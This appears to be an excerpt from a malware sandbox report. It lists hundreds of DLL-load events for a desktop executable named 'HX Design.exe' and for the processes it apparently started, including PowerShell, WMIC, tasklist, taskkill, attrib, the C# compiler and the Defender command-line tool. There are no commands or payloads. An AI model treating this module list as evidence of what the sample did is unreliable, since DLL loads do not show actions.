Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
